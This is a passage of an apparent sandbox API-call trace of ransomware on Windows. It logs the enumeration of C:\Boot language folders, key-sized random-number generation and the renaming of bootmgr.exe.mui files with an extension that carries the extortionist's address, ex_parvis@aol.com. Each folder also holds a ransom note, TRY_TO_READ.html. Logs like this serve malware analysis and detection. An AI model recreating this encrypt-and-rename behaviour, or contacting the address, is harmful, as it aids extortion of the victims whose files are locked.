	[0052.030] lstrcatW (in: lpString1="C:\\\\Boot\\pt-PT\\bootmgr.exe.mui", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Boot\\pt-PT\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Boot\\pt-PT\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR"
	[0052.030] MoveFileExW (lpExistingFileName="C:\\\\Boot\\pt-PT\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-pt\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\pt-PT\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\pt-pt\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 0
	[0052.030] CreateFileW (lpFileName="C:\\\\Boot\\pt-PT\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\pt-pt\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff
	[0052.030] GetProcessHeap () returned 0x540000
	[0052.030] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5919d0 | out: hHeap=0x540000) returned 1
	[0052.030] CloseHandle (hObject=0xffffffff) returned 0
	[0052.031] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846a8 | out: hHeap=0x540000) returned 1
	[0052.031] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584738 | out: hHeap=0x540000) returned 1
	[0052.031] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583a30
	[0052.031] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583ad8 | out: hHeap=0x540000) returned 1
	[0052.031] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5760 | out: hHeap=0x540000) returned 1
	[0052.031] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5788 | out: hHeap=0x540000) returned 1
	[0052.031] FindFirstFileW (in: lpFileName="C:\\\\Boot\\ru-RU\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc9cd6750, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9cd6750, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5755e0
	[0052.031] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.031] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.031] GetLastError () returned 0x6
	[0052.031] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583ad8
	[0052.031] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x4c) returned 0x58b6d8
	[0052.031] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58b6d8 | out: hHeap=0x540000) returned 1
	[0052.031] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5760
	[0052.031] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x34) returned 0x575620
	[0052.031] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x575620 | out: hHeap=0x540000) returned 1
	[0052.031] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10) returned 0x56ecd8
	[0052.031] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56ecd8 | out: hHeap=0x540000) returned 1
	[0052.031] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5760 | out: hHeap=0x540000) returned 1
	[0052.031] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583ad8 | out: hHeap=0x540000) returned 1
	[0052.031] FindNextFileW (in: hFindFile=0x5755e0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc9cd6750, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9cd6750, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0052.031] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.031] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.031] GetLastError () returned 0x6
	[0052.031] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583ad8
	[0052.031] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x4c) returned 0x58b6d8
	[0052.032] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58b6d8 | out: hHeap=0x540000) returned 1
	[0052.032] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5760
	[0052.032] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x34) returned 0x575620
	[0052.032] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x575620 | out: hHeap=0x540000) returned 1
	[0052.032] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10) returned 0x56ecd8
	[0052.032] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56ecd8 | out: hHeap=0x540000) returned 1
	[0052.032] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5760 | out: hHeap=0x540000) returned 1
	[0052.032] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583ad8 | out: hHeap=0x540000) returned 1
	[0052.032] FindNextFileW (in: hFindFile=0x5755e0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1
	[0052.032] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.032] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.032] GetLastError () returned 0x6
	[0052.032] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5760
	[0052.032] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583ad8
	[0052.032] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584738
	[0052.032] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584738 | out: hHeap=0x540000) returned 1
	[0052.032] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583ad8 | out: hHeap=0x540000) returned 1
	[0052.032] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5760 | out: hHeap=0x540000) returned 1
	[0052.032] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584738
	[0052.032] FindNextFileW (in: hFindFile=0x5755e0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9cd6750, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9cd6750, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9cd6750, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0052.032] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.032] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.032] GetLastError () returned 0x6
	[0052.032] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583ad8
	[0052.032] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583b10
	[0052.032] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846a8
	[0052.032] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846a8 | out: hHeap=0x540000) returned 1
	[0052.032] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583b10 | out: hHeap=0x540000) returned 1
	[0052.032] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583ad8 | out: hHeap=0x540000) returned 1
	[0052.032] FindNextFileW (in: hFindFile=0x5755e0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9cd6750, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9cd6750, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9cd6750, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0
	[0052.032] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846a8
	[0052.032] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b7800
	[0052.032] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596700
	[0052.032] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b7800 | out: pbBuffer=0x5b7800) returned 1
	[0052.033] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596700 | out: pbBuffer=0x596700) returned 1
	[0052.033] SetFileAttributesW (lpFileName="C:\\\\Boot\\ru-RU\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0
	[0052.033] lstrlenW (lpString="C:\\\\Boot\\ru-RU\\bootmgr.exe.mui") returned 30
	[0052.033] GetProcessHeap () returned 0x540000
	[0052.033] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa2) returned 0x5919d0
	[0052.033] lstrcpyW (in: lpString1=0x5919d0, lpString2="C:\\\\Boot\\ru-RU\\bootmgr.exe.mui" | out: lpString1="C:\\\\Boot\\ru-RU\\bootmgr.exe.mui") returned="C:\\\\Boot\\ru-RU\\bootmgr.exe.mui"
	[0052.033] lstrcatW (in: lpString1="C:\\\\Boot\\ru-RU\\bootmgr.exe.mui", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Boot\\ru-RU\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Boot\\ru-RU\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR"
	[0052.033] MoveFileExW (lpExistingFileName="C:\\\\Boot\\ru-RU\\bootmgr.exe.mui" (normalized: "c:\\boot\\ru-ru\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\ru-RU\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\ru-ru\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 0
	[0052.033] CreateFileW (lpFileName="C:\\\\Boot\\ru-RU\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\ru-ru\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff
	[0052.033] GetProcessHeap () returned 0x540000
	[0052.033] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5919d0 | out: hHeap=0x540000) returned 1
	[0052.033] CloseHandle (hObject=0xffffffff) returned 0
	[0052.033] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846a8 | out: hHeap=0x540000) returned 1
	[0052.033] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584738 | out: hHeap=0x540000) returned 1
	[0052.033] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583ad8
	[0052.033] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583a30 | out: hHeap=0x540000) returned 1
	[0052.033] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a57b0 | out: hHeap=0x540000) returned 1
	[0052.033] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a57d8 | out: hHeap=0x540000) returned 1
	[0052.033] FindFirstFileW (in: lpFileName="C:\\\\Boot\\sv-SE\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc9cd6750, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9cd6750, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x575620
	[0052.033] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.033] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.034] GetLastError () returned 0x6
	[0052.034] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583a30
	[0052.034] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x4c) returned 0x58b6d8
	[0052.034] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58b6d8 | out: hHeap=0x540000) returned 1
	[0052.034] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a57b0
	[0052.034] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x34) returned 0x575660
	[0052.034] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x575660 | out: hHeap=0x540000) returned 1
	[0052.034] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10) returned 0x56ecd8
	[0052.034] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56ecd8 | out: hHeap=0x540000) returned 1
	[0052.034] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a57b0 | out: hHeap=0x540000) returned 1
	[0052.034] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583a30 | out: hHeap=0x540000) returned 1
	[0052.034] FindNextFileW (in: hFindFile=0x575620, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc9cd6750, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9cd6750, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0052.034] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.034] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.034] GetLastError () returned 0x6
	[0052.034] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583a30
	[0052.034] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x4c) returned 0x58b6d8
	[0052.034] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58b6d8 | out: hHeap=0x540000) returned 1
	[0052.034] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a57b0
	[0052.034] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x34) returned 0x575660
	[0052.034] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x575660 | out: hHeap=0x540000) returned 1
	[0052.034] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10) returned 0x56ecd8
	[0052.034] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56ecd8 | out: hHeap=0x540000) returned 1
	[0052.034] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a57b0 | out: hHeap=0x540000) returned 1
	[0052.034] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583a30 | out: hHeap=0x540000) returned 1
	[0052.034] FindNextFileW (in: hFindFile=0x575620, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1
	[0052.034] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.034] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.034] GetLastError () returned 0x6
	[0052.034] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a57b0
	[0052.034] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583a30
	[0052.034] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584738
	[0052.034] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584738 | out: hHeap=0x540000) returned 1
	[0052.035] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583a30 | out: hHeap=0x540000) returned 1
	[0052.035] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a57b0 | out: hHeap=0x540000) returned 1
	[0052.035] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584738
	[0052.035] FindNextFileW (in: hFindFile=0x575620, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9cd6750, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9cd6750, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9cd6750, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0052.035] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.035] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.035] GetLastError () returned 0x6
	[0052.035] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583a30
	[0052.035] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583b10
	[0052.035] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846a8
	[0052.035] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846a8 | out: hHeap=0x540000) returned 1
	[0052.035] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583b10 | out: hHeap=0x540000) returned 1
	[0052.035] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583a30 | out: hHeap=0x540000) returned 1
	[0052.035] FindNextFileW (in: hFindFile=0x575620, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9cd6750, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9cd6750, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9cd6750, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0
	[0052.035] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846a8
	[0052.035] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b7908
	[0052.035] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596710
	[0052.035] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b7908 | out: pbBuffer=0x5b7908) returned 1
	[0052.035] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596710 | out: pbBuffer=0x596710) returned 1
	[0052.035] SetFileAttributesW (lpFileName="C:\\\\Boot\\sv-SE\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0
	[0052.035] lstrlenW (lpString="C:\\\\Boot\\sv-SE\\bootmgr.exe.mui") returned 30
	[0052.035] GetProcessHeap () returned 0x540000
	[0052.035] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa2) returned 0x5919d0
	[0052.035] lstrcpyW (in: lpString1=0x5919d0, lpString2="C:\\\\Boot\\sv-SE\\bootmgr.exe.mui" | out: lpString1="C:\\\\Boot\\sv-SE\\bootmgr.exe.mui") returned="C:\\\\Boot\\sv-SE\\bootmgr.exe.mui"
	[0052.035] lstrcatW (in: lpString1="C:\\\\Boot\\sv-SE\\bootmgr.exe.mui", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Boot\\sv-SE\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Boot\\sv-SE\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR"
	[0052.035] MoveFileExW (lpExistingFileName="C:\\\\Boot\\sv-SE\\bootmgr.exe.mui" (normalized: "c:\\boot\\sv-se\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\sv-SE\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\sv-se\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 0
	[0052.035] CreateFileW (lpFileName="C:\\\\Boot\\sv-SE\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\sv-se\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff
	[0052.036] GetProcessHeap () returned 0x540000
	[0052.036] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5919d0 | out: hHeap=0x540000) returned 1
	[0052.036] CloseHandle (hObject=0xffffffff) returned 0
	[0052.036] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846a8 | out: hHeap=0x540000) returned 1
	[0052.036] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584738 | out: hHeap=0x540000) returned 1
	[0052.036] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583a30
	[0052.036] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583ad8 | out: hHeap=0x540000) returned 1
	[0052.036] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5800 | out: hHeap=0x540000) returned 1
	[0052.036] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5828 | out: hHeap=0x540000) returned 1
	[0052.036] FindFirstFileW (in: lpFileName="C:\\\\Boot\\tr-TR\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc9cd6750, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9cd6750, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x575660
	[0052.036] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.036] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.036] GetLastError () returned 0x6
	[0052.036] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583ad8
	[0052.036] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x4c) returned 0x58b6d8
	[0052.036] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58b6d8 | out: hHeap=0x540000) returned 1
	[0052.036] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5800
	[0052.036] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x34) returned 0x5756a0
	[0052.036] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5756a0 | out: hHeap=0x540000) returned 1
	[0052.036] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10) returned 0x56ecd8
	[0052.036] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56ecd8 | out: hHeap=0x540000) returned 1
	[0052.036] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5800 | out: hHeap=0x540000) returned 1
	[0052.036] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583ad8 | out: hHeap=0x540000) returned 1
	[0052.036] FindNextFileW (in: hFindFile=0x575660, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc9cd6750, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9cd6750, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0052.037] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.037] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.037] GetLastError () returned 0x6
	[0052.037] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583ad8
	[0052.037] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x4c) returned 0x58b6d8
	[0052.037] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58b6d8 | out: hHeap=0x540000) returned 1
	[0052.037] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5800
	[0052.037] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x34) returned 0x5756a0
	[0052.037] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5756a0 | out: hHeap=0x540000) returned 1
